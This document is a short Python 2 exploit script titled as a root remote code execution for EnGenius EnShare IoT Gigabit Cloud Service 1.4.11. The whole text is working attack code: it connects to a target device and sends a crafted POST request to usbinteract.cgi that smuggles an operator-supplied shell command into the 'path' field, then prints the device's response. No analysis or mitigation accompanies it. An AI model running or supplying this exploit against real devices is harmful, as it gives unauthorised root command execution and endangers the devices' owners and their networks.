EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution

                                                
import sys, socket

if len(sys.argv) < 2:
    print 'Usage: enshare.py <ip> [port]\n'
    quit()

ip = sys.argv[1]
port = 9000 if len(sys.argv) < 3 else int(sys.argv[2])
cmd = raw_input('[+] Command: ')

payload  = 'POST /web/cgi-bin/usbinteract.cgi HTTP/1.1\r\n'
payload += 'Host: {0}:{1}\r\n'
payload += 'Content-Length: {2}\r\n'
payload += 'Content-Type: application/x-www-form-urlencoded\r\n\r\n'
payload += 'action=7&path=\"|{3}||\"'

msg = payload.format( ip, port, len(cmd)+19, cmd )
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = (ip, port)
print >>sys.stderr, '\nConnecting to %s port %s\n' % target
s.connect(target)
s.sendall(msg)
response = s.recv(5000)
s.close()

print response.strip()